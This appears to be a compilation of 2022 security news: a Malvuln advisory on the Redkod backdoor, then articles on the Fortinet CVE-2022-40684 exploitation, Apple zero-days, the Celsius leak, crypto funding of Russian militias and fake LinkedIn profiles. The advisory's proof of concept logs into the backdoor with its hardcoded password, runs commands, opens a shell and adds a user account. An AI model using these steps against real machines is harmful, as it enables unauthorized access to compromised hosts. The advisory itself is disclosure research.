Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

The authentication bypass flaw in FortiOS, FortiProxy and FortiSwitchManager is easy to find and exploit, security experts say.

Concerns over a critical authentication bypass vulnerability in certain Fortinet appliances heightened this week with the release of proof-of-concept (PoC) exploit code and a big uptick in vulnerability scans for the flaw.

The bug (CVE-2022-40684) is present in multiple versions of Fortinet's FortiOS, FortiProxy and FortiSwitchManager technologies. It allows an unauthenticated attacker to gain administrative access to affected products via specially crafted HTTPS and HTTP requests, and potentially use that as entry point to the rest of the network.

Bharat Jogi, director of vulnerability threat research at Qualys says researchers at the company have observed mass scans being carried out by various threat actors to identify Internet facing vulnerable systems for compromise.

"They are compromising these systems to create a super\_admin user which provides them with complete access and control," Jogi says. "Once this level of access is achieved, they have the ability to delete any trace of their successful exploitation attempt, making it difficult for organizations to track compromised assets in their environment."

If this flaw is successfully exploited, an attacker would have complete access to the organization's internal systems that were previously protected by Fortinet's firewalls, he says. "Having a compromised firewall is like laying out a red carpet for threat actors to stroll right into your organization's environment," Jogi notes.

**Added to CISA's Known Exploited Vulnerabilities Catalog**

The US Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the vulnerability to its Known Exploited Vulnerabilities catalog. Federal executive branch agencies—which are required to remediate vulnerabilities in the catalog within specific deadlines—have until Nov. 1 to address it. Though the deadline applies only to federal agencies, security experts have previously noted how it is a good idea for all organizations to monitor the vulnerabilities in the catalog and follow CISA's deadline for implementing fixes.

Fortinet privately notified customers of the affected products about the vulnerability last Friday, along with instructions to immediately update to patched versions of the technology the company had just released. It advised companies that could not update for any reason to immediately disable Internet-facing HTTPS administration until they could upgrade to the patched versions. 

"Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade," Fortinet said in its private notification, a copy of which was posted on Twitter the same day.

Fortinet followed up with a public vulnerability advisory on Monday describing the flaw and warning customers of potential exploit activity. The company said it was aware of instances where attackers had exploited the vulnerability to download the configuration file from affected systems and to add a malicious super\_admin account called "fortigate-tech-support".

Since then, penetration testing from Horizon3.ai has released proof-of-concept code for exploiting the vulnerability along with a technical deep dive of the flaw. A template for scanning for the vulnerability has also become available on GitHub.

Exacerbating the concerns is the relatively low bar for exploiting the flaw. "This vulnerability is extremely easy for an attacker to exploit. All that is required is access to the management interface on a vulnerable system," Zach Hanley, chief attack engineer at Horizon3.ai, tells Dark Reading

**Increase in Scanning Activity for the Flaw**

Qualys isn't the only company observing increased vulnerability scanning for the flaw. James Horseman, exploit developer at Horizon3.ai says public data from GreyNoise—which tracks Internet scanning activity hitting security tools—shows the number of unique IPs using the exploit has grown from the single digits a few days ago, to over forty as of Oct. 14.

"We expect the number of unique IPs using this exploit to rapidly increase in the coming days," Horseman says. It is not hard for attackers to find vulnerable systems, he adds: A Shodan search for instance shows more than 100,000 Fortinet systems worldwide. 

"Not all of these will be vulnerable, but a large percentage will be," Horseman says.

Johannes Ullrich, dean of research at the SANS Institute, says he has observed scans associated with an older FortiGate vulnerability (CVE-2018-13379,) hitting SANS' honeypots in the days following disclosure of the new bug. He says there are two theories why that might be happening.

One of them is that an attacker may have tried to catch as many devices as possible that had not yet been patched for the old vulnerability. Given the attention the new vulnerability has gotten it is likely the old vulnerability will get patched as well now, he says.

"Or the attacker was trying to find Fortinet devices to exploit using the new vulnerability once it is available," he theorizes. "The old vulnerability scanner they had sitting on the shelf may still work to identify Fortinet devices."

**A Popular Attacker Target**

Concerns over vulnerabilities in Fortinet products are not new. The company's technologies—and those of others selling similar appliance—have been frequently targeted by attackers trying to gain an initial foothold on target network. 

Last November. The FBI, CISA and others issued an advisory warning of Iranian advanced persistent threat actors exploiting vulnerabilities in Fortinet and Microsoft products. A similar alert in April 2021 warned of attackers exploiting flaws in FortiOS to break into multiple government, commercial, and technology services.  

"These vulnerable devices are often edge devices, so an attacker could potentially use this vulnerability to gain access to an organization's internal networks to launch further attacks," Hanley says.

Fortinet itself has recommended that organizations that are able to, must update to the newly patched versions of FortiOS, FortiProxy and FortiSwitch Manager. For organizations that cannot immediately update, Fortinet has provided guidance on how to disable the HTTP/HTTPS interface or limit IP addresses that can reach the administrate interface of the affected products.

Hanley says organizations sometimes may not be able to patch due to the potential downtime associated with updating a device. "However, an organization should be able to apply \[the\] workaround to prevent this vulnerability from being exploited on unpatched machines by following Fortinet’s guidance."

Qualys' Jogi adds, "It is also crucial to review any attempts of exploit to identify systems that may have already been compromised. If an organization is unable to patch their systems, then they must disable the system admin interface immediately."

Concerns Over Fortinet Flaw Mount; PoC Released, Exploit Activity Grows

Such exploits sell for up to $10 million, making them the single most valuable commodity in the cybercrime underworld.

Over the past few years, there's been an increase in the number of attackers targeting Apple, especially with zero-day exploits. One major reason is that a zero-day exploit might just be the most valuable asset in a hacker's portfolio — and hackers know it. In 2022 alone, Apple has discovered seven zero-days and has followed up these discoveries with the required remedial updates. But it doesn't seem like the cat-and-mouse game will die anytime soon.

In 2021, the number of recorded zero-days overall was more than double the figures recorded in 2020, showing the highest level since tracking began in 2014, according to a repository maintained by Project Zero. MIT Technology Review attributed this rise to the "rapid global proliferation of hacking tools" and the willingness of powerful state and non-state groups to invest handsomely in the discovery and infiltration of these operating systems. Threat actors actively search for vulnerabilities, find a way to exploit them, then sell the information to the highest bidder.

**The Zero-Day Battles**

Suffering repeatedly from these infiltrations is the tech giant, Apple. After recovering from 12 recorded exploitations and remediation in 2021, Apple was welcomed into the new year of 2022 with two zero-day bugs in its operating systems and a WebKit flaw that could have leaked users' browsing data. Barely one month after releasing 23 security patches to fix those issues, another flaw was discovered — one that would allow attackers to infect users' devices when they process certain malicious Web content.

Fast-forward to August 17 and Apple revealed it had found two new vulnerabilities in its operating system: CVE-2022-32893 and CVE-2022-32894. The first vulnerability gives remote code execution (RCE) access to Apple's Safari Web browser kit, used by every iOS and macOS-enabled browser. The second, another RCE flaw, gives attackers complete and unrestricted access to the user's software and hardware. Both vulnerabilities affect most Apple devices — especially the iPhone 6 and later models, iPad Pro, iPad Air 2 onwards, iPad 5th generation and newer models, iPad mini 4 and newer versions, iPod touch (7th generation), and macOS Monterrey. Recognizing the risk level of such a threat, Apple recently released security updates to remediate these "actively exploited" vulnerabilities. This would be the fifth and sixth zero-day vulnerability exploited in Apple's systems just this year.

A couple weeks later, speculations about another zero-day exploit arose. One research team, in particular, said it found an ad on the Dark Web offering a supposedly weaponized version of an Apple vulnerability for over €2 million. While these speculations remain unconfirmed, soon after Apple released security updates for its seventh actively exploited zero-day vulnerability of 2022: CVE-2022-32917. According to the advisory, attackers could leverage this flaw to create applications that execute arbitrary code with kernel capabilities.

Zero-day exploits sell for up to $10 million, Digital Shadows' Photon Research Team reports, positioning them as the single most expensive commodity in the cybercrime underworld. With a bounty like that, the market for these exploits are bound to expand and further exacerbate cyber threats.

**Apple Isn't Alone in the Zero-Day Wild**

Apple is not alone in this struggle. In recent months, tech giants like Microsoft, Adobe, and Google have also had to patch zero-day vulnerabilities that have been actively exploited in the deep Web. A June article on Dark Reading noted that there had been "a total of 18 security vulnerabilities exploited as unpatched zero-days in the wild," and the number has since risen to 24. From all indications, attackers won't slow down anytime soon, especially as new variants of already patched zero days continue to surface.

As adversaries continue to find loopholes across systems and security architectures, enterprise leaders must keep prioritizing proactive defenses to stay ahead of attacks. One way to be proactive, according to Craig Harber, CTO at Fidelis Cybersecurity, is for organizations to map cyber terrains by gaining full visibility into their entire systems.

"Discovery is a ballet of strategy, inventory, and evaluation. Organizations need the ability to continuously discover, classify, and assess assets — including servers, enterprise IoT, laptops, desktops, shadow IT, and legacy systems," he notes.

Apple's Constant Battles Against Zero-Day Exploits

By releasing half a million users’ transactions in a bankruptcy court filing, the company has opened a vast breach in its users’ financial privacy.

The paradoxical nature of cryptocurrency's privacy is that the blockchain, that unchangeable ledger of all a cryptocurrency's transactions, serves as both a map and a mask: Bitcoin are easy enough to follow from one address to the next. But only a few entities, like the cryptocurrency exchanges that allow users to trade their crypto for traditional currency, are able to match the inscrutable strings of numbers and letters in those addresses to real-world identities. So when one of those exchanges suddenly dumps a massive internal user database online, they haven't just spilled their own data. They've offered a key to decipher a vastly larger set of financial secrets.

That's what happened last week when Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing. As part of its bankruptcy proceedings—in which the company's owners are accused of pulling tens of millions of dollars worth of crypto out of the exchange before revealing its insolvency—the company's attorneys released a document that appears to include the transaction data of half a million of its users from April of this year until it ceased trading in June. That database was briefly posted as a 14,500-page PDF to the court records website PACER before being taken down—but not before Gizmodo copied it to the Internet Archive, where it was widely downloaded before being removed there, too.

The data dump includes the names and transaction details of Celsius' users along with the dates and amounts of each payment. The database doesn't include the cryptocurrency addresses that directly identify senders and recipients on cryptocurrencies' blockchains, but the unique payment amounts, detailed down to more than a dozen decimal places of precision in many cases, nonetheless make it possible to match the payments to blockchains' records.

All of that means that the Celsius leak offers a rare gift to both professional and amateur cryptocurrency tracers, allowing them to not only see Celsius users' transactions, but also identify and trace those users' funds across the blockchains. That could potentially open new possibilities to identify scammers, hackers, or any other illicit users who might have exploited Celsius as a cash-out service for ill-gotten coins. But it also opens Celsius' users to exploitation by any rip-off artist or thief who combs through the data, connects it to other accounts, and identifies their cryptocurrency holdings as a ripe target.

"This is really one of the worst exchange data breaches since Mt. Gox," says Nick Bax, head of research at security consultancy and asset recovery firm Convex Labs. But even as he compares the Celsius leak to the disastrous breach of the early Bitcoin exchange Mt. Gox, which was bankrupted by hackers in 2014 and had its transaction database leaked online, he also calls it a "dream come true for analysts" focused on cryptocurrency tracing.

“You can find someone’s balance, deposits, and withdrawals and then correlate all that to the blockchain,” Bax says. “We can use it for good, but it can absolutely be misused too. Criminals are going through this right now, looking for whoever has the biggest balances.” Once they’re identified, Bax warns, those wealthy crypto holders could be targeted with spear-phishing, scams, and even physical extortion.

Cryptocurrency tracers in law enforcement, government regulators, and private firms are no doubt already following flows of funds to and from Celsius, scouring it for leads in their own research. "This is data we'll ingest, analyze, and have available as part of our investigations, and I suspect others will too," says Matt Edman, cofounder of the security startup Naxo. Edman previously worked as an FBI contractor at the Mitre Corporation, where he helped trace cryptocurrency in the criminal case of Ross Ulbricht, the creator of the Silk Road dark web market.

"When it comes to cryptocurrency tracing, following the flow of funds is not really the hard part," Edman adds. "The tricky part in those investigations is the attribution—associating an address or transaction with an individual. That's where datasets like this are key."

Celsius didn't respond to WIRED's request for comment.

In just the days following Celsius' disclosure of the database in court records, internet sleuths have already begun posting findings from the data. One well-known independent cryptocurrency tracer, who goes by the Twitter handle ZachXBT, posted evidence from the leak that a Celsius user and influencer named Lark Davis had promoted Celsius after pulling his own $2.5 million worth of crypto out of the exchange. (Davis didn't immediately respond to WIRED's request for comment.) The website Celsiusnetworth.com already claims to allow anyone to search the data for individuals' holdings at the exchange.

Meanwhile, a cryptocurrency tracer and developer for decentralized finance firm Viper Labs, who goes by the name Federico Notte, converted the PDF from Celsius' court filing into a spreadsheet and posted a link to his public Twitter account. He tells WIRED he hopes to use the database in combination with blockchain analysis to figure out the transactions of major trading funds, in hopes of learning their tactics. "It's something you can definitely do," says Notte. "It's also a major privacy concern for these people, too."

But even as legitimate analysts and investigators dig into the data, some cryptocurrency tracers emphasize that it will be of far more value to criminals. "The amount of private information is quite scary, really," says Thibaud Madelin, who leads research at cryptocurrency-tracing firm Elliptic. "Scammers will be scouting this list, and they’ll know how much people have spent, how much they’ve lost, how much they hope to make back."

"They’re ruthless," Madelin adds, referring to scammers. "And this will give them thousands of opportunities."

Celsius Exchange Data Dump Is a Gift to Crypto Sleuths—and Thieves

Blockchain investigators have uncovered at least $4 million—and counting—in cryptocurrency fundraising has reached Russia's violent militia groups.

As Russian troops have flooded into Ukraine’s borders for the past eight months—and with an ongoing mobilization of hundreds of thousands more underway—the Western world has taken drastic measures to cut the economic ties that fuel Russia’s invasion and occupation. But even as those global sanctions have carefully excised Russia from global commerce, millions of dollars have continued to flow directly to Russian military and paramilitary groups in a form that’s proven harder to control: cryptocurrency.

Since Russia launched its full-blown invasion of Ukraine in February, at least $4 million worth of cryptocurrency has been collected by groups supporting Russia’s military in Ukraine, researchers have found. According to analyses by cryptocurrency-tracing firms Chainalysis, Elliptic, and TRM Labs, as well as investigators at Binance, the world’s largest cryptocurrency exchange, recipients include paramilitary groups offering ammunition and equipment, military contractors, and weapons manufacturers. That flow of funds, often to officially sanctioned groups, shows no sign of abating and may even be accelerating: Chainalysis traced roughly $1.8 million in funding to the Russian military groups in just the past two months, nearly matching the $2.2 million it found the groups received in the five months prior. And despite the ability to trace those funds, freezing or blocking them has proven difficult, due largely to unregulated or sanctioned cryptocurrency exchanges—most of them based in Russia—cashing out millions in donations earmarked for invaders.

“Our aim is to identify all the crypto wallets being used by Russian military groups and the people helping them; to find, seize and block all this activity that is helping to buy the bullets, the ammunition of this occupation,” says Serhii Kropyva, who until recently served as deputy of Ukraine’s Cyber Police and advisor to the country’s prosecutor general. “With the close cooperation of companies like Chainalysis and Binance, we can see all the wallets involved in this criminal activity, these money flows of millions of dollars. But we can, unfortunately, see that the transfer is continuing all the time.”

In separate reports, the cryptocurrency-tracing firms and Binance’s investigations team each tracked donations to the Russian war effort that very often began with public posts on the messaging app Telegram soliciting crowdfunded donations. Chainalysis, for instance, found Telegram posts from organizations including the pro-Russian media sites Rybar and Southfront, as well as the paramilitary group Rusich—which has ties to the notorious Wagner mercenary group—all posting cryptocurrency donation addresses to Telegram. These posts told followers that the money raised there would be used for everything from weaponized drones to radios, rifle accessories, and body armor. In another instance, Chainalysis points to a fundraiser by a group called Project Terricon that attempted to auction NFTs to support pro-Russian militia groups in Eastern Ukraine, though the NFTs were removed from the marketplace they were hosted on before any bids were placed.

Binance’s investigations team, in its own report, found that a total of $4.2 million in crypto had been funneled to Russian military groups since February. The groups named in its research didn’t entirely overlap with those named in Chainalysis’ report, suggesting that the overall funding could be far greater than either Binance’s or Chainalysis’ total. Binance, for instance, points to a pro-Russian “cultural heritage” group known as MOO Veche that has carried out fundraisers for military equipment similar to the kinds funded by the groups Chainalysis flagged. While Binance, TRM Labs, and Elliptic all name MOO Veche as a major fundraiser, Elliptic traced $1.7 million in crypto donations to the group, far more than the other researchers.

A screenshot of a Russian-language Telegram post from the pro-Russian military MOO Veche group, describing equipment paid for with its fundraising, including “thermal imagers, binoculars with rangefinders, spotting scopes, car radios, collimators and first aid kits.“

Telegram via Andy Greenberg

Other organizations that Binance spotted raising money through cryptocurrency crowdfunding on Telegram include the pro-Russian nationalist groups Save Donbas and REAR, as well as the Russian arms manufacturer Lobaev, which it saw directly soliciting donations on the platform. Yet another group, known as Romanov Light, whose fundraising was spotted by TRM Labs and Elliptic, claimed to be collecting crypto for Russian special forces. Romanov Light raised as much as $330,000 worth of donations, according to Elliptic, which it told donors it spent on military equipment like weapon accessories, flashlights, and armor plates.

Despite the relative clarity of all that financial tracing, preventing cryptocurrency from continuing to bolster Russia’s unprovoked incursion into Ukraine hasn’t been simple. Exchanges can block or freeze funds at the points where they’re exchanged for traditional currency. But according to Chainalysis, the majority of the crypto funds the groups have raised have been cashed out through Russian exchanges, including Chatex, Suex, and Garantex—all of which have already been targeted with Western sanctions for their extensive use by criminals. Chatex and Garantex did not respond to WIRED’s request for comment. Suex no longer appears to have a public website, and no contact information for the exchange could be found.

Not every exchange that has served as an ATM for Russian military crypto crowdfunding is hosted in Russia, however. Blockchain analysts who spoke to WIRED pointed to seven other exchange services, some hosted in India and China, that have received funds from the pro-Russian groups they tracked, though they declined to name them on the record, in part because the amounts of those funds in most cases were in the single-digit thousands or less.

In one telling example of how hard it is to prevent these cash-outs, however, analysts saw MOO Veche send more than $150,000 worth of bitcoin to an exchange hosted on the infrastructure of the Chinese cryptocurrency exchange Huobi—a “nested” exchange that essentially uses Huobi as its trading platform. But any responsibility that Huobi might have for blocking or freezing those funds was complicated by another unknown intermediary service that analysts saw the money travel through before entering the Huobi-hosted service. When WIRED reached out to Huobi for comment, it wrote in a statement that it has a “know-your-customer” process “which ensures to the best of our ability that our clients’ source of funds are above board.”

Binance, for its part, says its exchange accounts were also used by four of the groups it tracked and received more than $208,000 worth of cryptocurrencies. It tells WIRED that it froze all four accounts it discovered. “We’re making sure that no harm comes to civilians as a result of the fundraising that happens in these extremist spaces,” says Jennifer Hicks, who manages Binance’s intelligence and investigations team. “When cryptocurrency exchanges know that something illicit is happening that will end in real-world, kinetic effects like this, it’s the exchange’s responsibility to put a stop to it as fast as possible.”

Even when exchanges do monitor for crypto sent from sanctioned groups like these pro-Russian fundraisers, that dirty money won’t always be straightforward to detect, warns Thibaud Madelin, who leads research at Elliptic. He says he’s increasingly seeing Russian sources of illicit funds use “bridges” or “coin swaps”—services that allow easy trading of one cryptocurrency for another, often without offering any identifying information—as money-laundering techniques. He’s watched those tools grow in popularity among dark-web black markets and cybercriminal users and expects the same will happen with those seeking to launder illicit arms funding. “It’s a bit early to say definitively. But what we’re seeing is that it’s likely to become a bigger problem,” says Madelin. “They’re likely to mirror the methodologies seen across dark net services users, enabling large-scale money laundering and potentially sanctions evasion.”

An image in Chainalysis’s report pulled from a pro-Russian social media fundraiser that shows items funded through cryptocurrency donations, including targeting equipment, drone components, and satellite radios.

Courtesy of Chainanalysis

Millions of dollars in cryptocurrency funding to Russian troops may be the least of Ukraine’s problems in a war where Russia has thrown billions into its invasion force. Ukraine, it’s worth noting, has also vastly out-raised Russia in cryptocurrency: By Elliptic’s count, the Ukrainian government has collected more than $77 million in crypto donations since the war began. But that is to be expected, given the West’s broad support of Ukraine following Russia’s unprovoked aggression and the global sanctions placed on Russia. And even the smaller amount of cryptocurrency Russian forces have raised demonstrates cryptocurrency’s ongoing potential to circumvent those sanctions and offer another financial lifeline to Russia’s war machine.

“It’s not like Russia is buying new tanks with this money. They’re paying for thermal imaging scopes and UAVs,” says Andrew Fierman, a sanctions-focused Chainalysis researcher. “But for grassroots facilitation of these militia efforts, any amount of money that they receive to bolster their gear is going to have an impact.” And despite all the light that cryptocurrency tracers can shine on that funding—and the West’s best efforts to stop it—the crypto flow into Russia’s war chest continues.

The Fight to Cut Off the Crypto Fueling Russia's Ukraine Invasion

TOTOLINK NR1800X V9.1.0u.6279_B20210910 was discovered to contain an authenticated stack overflow via the command parameter in the setTracerouteCfg function.

CVE-2022-41523

A recent proliferation of phony executive profiles on LinkedIn is creating something of an identity crisis for the business networking site, and for companies that rely on it to hire and screen prospective employees. The fabricated LinkedIn identities — which pair AI-generated profile photos with text lifted from legitimate accounts — are creating major headaches for corporate HR departments and for those managing invite-only LinkedIn groups.

A recent proliferation of phony executive profiles on **LinkedIn** is creating something of an identity crisis for the business networking site, and for companies that rely on it to hire and screen prospective employees. The fabricated LinkedIn identities — which pair AI-generated profile photos with text lifted from legitimate accounts — are creating major headaches for corporate HR departments and for those managing invite-only LinkedIn groups.

Some of the fake profiles flagged by the co-administrator of a popular sustainability group on LinkedIn.

Last week, KrebsOnSecurity examined a flood of inauthentic LinkedIn profiles all claiming Chief Information Security Officer (CISO) roles at various Fortune 500 companies, including **Biogen**, **Chevron**, **ExxonMobil**, and **Hewlett Packard**.

Since then, the response from LinkedIn users and readers has made clear that these phony profiles are showing up en masse for virtually all executive roles — but particularly for jobs and industries that are adjacent to recent global events and news trends.

Hamish Taylor runs the **Sustainability Professionals** group on LinkedIn, which has more than 300,000 members. Together with the group’s co-owner, Taylor said they’ve blocked _more than 12,700 suspected fake profiles so far this year_, including dozens of recent accounts that Taylor describes as “cynical attempts to exploit Humanitarian Relief and Crisis Relief experts.”

“We receive over 500 fake profile requests to join on a weekly basis,” Taylor said. “It’s hit like hell since about January of this year. Prior to that we did not get the swarms of fakes that we now experience.”

The opening slide for a plea by Taylor’s group to LinkedIn.

Taylor recently posted an entry on LinkedIn titled, “**The Fake ID Crisis on LinkedIn**,” which lampooned the “60 Least Wanted ‘Crisis Relief Experts’ — fake profiles that claimed to be experts in disaster recovery efforts in the wake of recent hurricanes. The images above and below show just one such swarm of profiles the group flagged as inauthentic. Virtually all of these profiles were removed from LinkedIn after KrebsOnSecurity tweeted about them last week.

Another “swarm” of LinkedIn bot accounts flagged by Taylor’s group.

Mark Miller is the owner of the DevOps group on LinkedIn, and says he deals with fake profiles on a daily basis — often hundreds per day. What Taylor called “swarms” of fake accounts Miller described instead as “waves” of incoming requests from phony accounts.

“When a bot tries to infiltrate the group, it does so in waves,” Miller said. “We’ll see 20-30 requests come in with the same type of information in the profiles.”

After screenshotting the waves of suspected fake profile requests, Miller started sending the images to LinkedIn’s abuse teams, which told him they would review his request but that he may never be notified of any action taken.

Some of the bot profiles identified by Mark Miller that were seeking access to his DevOps LinkedIn group. Miller said these profiles are all listed in the order they appeared.

Miller said that after months of complaining and sharing fake profile information with LinkedIn, the social media network appeared to do something which caused the volume of group membership requests from phony accounts to drop precipitously.

“I wrote our LinkedIn rep and said we were considering closing the group down the bots were so bad,” Miller said. “I said, ‘You guys should be doing something on the backend to block this.”

Jason Lathrop is vice president of technology and operations at **ISOutsource**, a Seattle-based consulting firm with roughly 100 employees. Like Miller, Lathrop’s experience in fighting bot profiles on LinkedIn suggests the social networking giant will eventually respond to complaints about inauthentic accounts. That is, if affected users complain loudly enough (posting about it publicly on LinkedIn seems to help).

Lathrop said that about two months ago his employer noticed waves of new followers, and identified more than 3,000 followers that all shared various elements, such as profile photos or text descriptions.

“Then I noticed that they all claim to work for us at some random title within the organization,” Lathrop said in an interview with KrebsOnSecurity. “When we complained to LinkedIn, they’d tell us these profiles didn’t violate their community guidelines. But like heck they don’t! These people don’t exist, and they’re claiming they work for us!”

Lathrop said that after his company’s third complaint, a LinkedIn representative responded by asking ISOutsource to send a spreadsheet listing every legitimate employee in the company, and their corresponding profile links.

Not long after that, the phony profiles that were not on the company’s list were deleted from LinkedIn. Lathrop said he’s still not sure how they’re going to handle getting new employees allowed into their company on LinkedIn going forward.

It remains unclear why LinkedIn has been flooded with so many fake profiles lately, or how the phony profile photos are sourced. Random testing of the profile photos shows they resemble but do not match other photos posted online. Several readers pointed out one likely source — the website thispersondoesnotexist.com, which makes using artificial intelligence to create unique headshots a point-and-click exercise.

Cybersecurity firm **Mandiant** (recently acquired by **Google**) told Bloomberg that hackers working for the North Korean government have been copying resumes and profiles from leading job listing platforms LinkedIn and Indeed, as part of an elaborate scheme to land jobs at cryptocurrency firms.

Fake profiles also may be tied to so-called “pig butchering” scams, wherein people are lured by flirtatious strangers online into investing in cryptocurrency trading platforms that eventually seize any funds when victims try to cash out.

In addition, identity thieves have been known to masquerade on LinkedIn as job recruiters, collecting personal and financial information from people who fall for employment scams.

But the Sustainability Group administrator Taylor said the bots he’s tracked strangely don’t respond to messages, nor do they appear to try to post content.

“Clearly they are not monitored,” Taylor assessed. “Or they’re just created and then left to fester.”

This experience was shared by the DevOp group admin Miller, who said he’s also tried baiting the phony profiles with messages referencing their fakeness. Miller says he’s worried someone is creating a massive social network of bots for some future attack in which the automated accounts may be used to amplify false information online, or at least muddle the truth.

“It’s almost like someone is setting up a huge bot network so that when there’s a big message that needs to go out they can just mass post with all these fake profiles,” Miller said.

In last week’s story on this topic, I suggested LinkedIn could take one simple step that would make it far easier for people to make informed decisions about whether to trust a given profile: Add a “created on” date for every profile. Twitter does this, and it’s enormously helpful for filtering out a great deal of noise and unwanted communications.

Many of our readers on Twitter said LinkedIn needs to give employers more tools — perhaps some kind of application programming interface (API) — that would allow them to quickly remove profiles that falsely claim to be employed at their organizations.

Another reader suggested LinkedIn also could experiment with offering something akin to Twitter’s verified mark to users who chose to validate that they can respond to email at the domain associated with their stated current employer.

In response to questions from KrebsOnSecurity, LinkedIn said it was considering the domain verification idea.

“This is an ongoing challenge and we’re constantly improving our systems to stop fakes before they come online,” LinkedIn said in a written statement. “We do stop the vast majority of fraudulent activity we detect in our community – around 96% of fake accounts and around 99.1% of spam and scams. We’re also exploring new ways to protect our members such as expanding email domain verification. Our community is all about authentic people having meaningful conversations and to always increase the legitimacy and quality of our community.”

In a story published Wednesday, Bloomberg noted that LinkedIn has largely so far avoided the scandals about bots that have plagued networks like Facebook and Twitter. But that shine is starting to come off, as more users are forced to waste more of their time fighting off inauthentic accounts.

